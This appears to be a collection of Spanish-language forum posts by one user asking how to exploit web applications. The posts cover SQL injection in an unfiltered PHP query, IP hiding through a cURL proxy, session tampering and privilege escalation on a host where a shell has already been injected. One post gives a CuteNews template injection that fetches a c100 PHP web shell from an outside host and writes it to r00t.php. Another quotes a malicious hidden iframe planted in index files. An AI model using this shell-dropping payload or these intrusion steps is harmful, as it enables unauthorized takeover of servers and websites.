Mensajes

Bueno amigos tengo la siguiente duda.

tengo esta sentencia sql

Código [Seleccionar] Expandir

$thefaq=mysql_query("SELECT question,answer,lasteditedby,lastedit FROM faq WHERE id='$faqid'");

$faq=mysql_fetch_array($thefaq);

y para desplegar la salida html realiza la verificacion

Código [Seleccionar] Expandir

if($faq[question]){

..... sale el HTML

}

como podria borrar datos o bien como podria ingresar una shell.

sabiendo que no el codigo entra limpio sin filtro de magic quotes etc.

Bueno amigos lo que necesito es ver el codigo fuente de la web, pero que este nunca detecte mi real ip, es por eso que requiero de cURL ... tengo un codigo pero no me funciona como espero.

Código (php) [Seleccionar] Expandir


<?php
$ch = curl_init('http://www.miip.cl/');
curl_setopt($ch, curlOPT_HTTPproxyTUNNEL, 1);
curl_setopt($ch, curlOPT_proxy, '200.113.165.54:8080');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$page = curl_exec($ch);
curl_close($ch);
 
print $page;
?>


no me cambia la ip ....

alguien tiene un script similar ?


Gracias.

Se pasaron  realemnte tenia esa duda porque no quiero que mi sistema sea facil de vulnerar!

Gracias.

Bueno amigos lo que pasa es que estoy programando un panel de control y estoy tomando todos los cuidados posibles es por ello que quiero hacer la siguiente pregunta.

¿Es posible modificar el valor de las $_SESSION?

porque lo pregunto porque si yo en panel guardo el nivel del usuario

1 = admin
2 = moderador
3 = cliente

$_SESSION['nivel'] = 1;

..... alguien podria modificar su nivel y paff me caga XD

Me despondo a mi mismo, hay una forma mas fácil sin dejar rastros visibles.

editen el templete default cualquiera, ejemplo

Active News... al final agregan

HTML;
phpinfo();

................. inyectando la shell seria

HTML;
$s = file_get_contents('http://blacknite.eu/php_shells/c100.txt');
$f = fopen('r00t.php', 'x');
fwrite($f, $s); fclose($f);


Saludos.

hay un problema, cuando tu dejas

Full URL to CuteNews Directory http://localhost/cutenews\

el archivo config.php queda asi

$config_http_script_dir = "http://localhost/cutenews\\";

por ende no toma :S


hay otra forma?

Bueno realmente he buscado informacion sobre esto en google

http://x8n.ru:8080/index.php

y sale simplemente que es un malware...

-------

Les cuento tengo un sitio web y google lo ha bloqueado porque me dice que es unsitio atacante, cosa que no lo es. Pero revisando mis archivos index.php y varios de mis otros index tenian dentro un <iframe src="http://x8n.ru:8080/index.php></iframe> en hidden y bueno obviamente lo borre y todo, pero mi preguntas son.

¿como llego hay?
¿porque afecta mis archivo index?
¿como puedo solucionar esto?


Gracias.

[126]

Bueno lo que pasa es que tengo una shell injectada pero lo malo es que no he podido hacer mucho ya que el panel de control que usa el servidor es Ferozo y cual deja bastante limitado todo, a tal punto que cualquier comando que quiera ejecutar me lanza como resultado 126, no puedo ejecutar comandos en el servidor....

¿Encontonces como podre escalar privilegios?

¿Que me recomiendan?


Gracias.

Tengo una duda como se llama esa herramienta que estas usando para editar el input de ese form ?... gracias

El usuario y contraseña ya lo tengo tengo acceso al administrador pero lo que quiero es injectarle una shell, lamentablemente el host no acepta RFI y tampoco me permite leer los archivos de la carpeta "data" por lo cual es imposible usar los otros conocidos exploit.

lo que quiero es injectar un shell.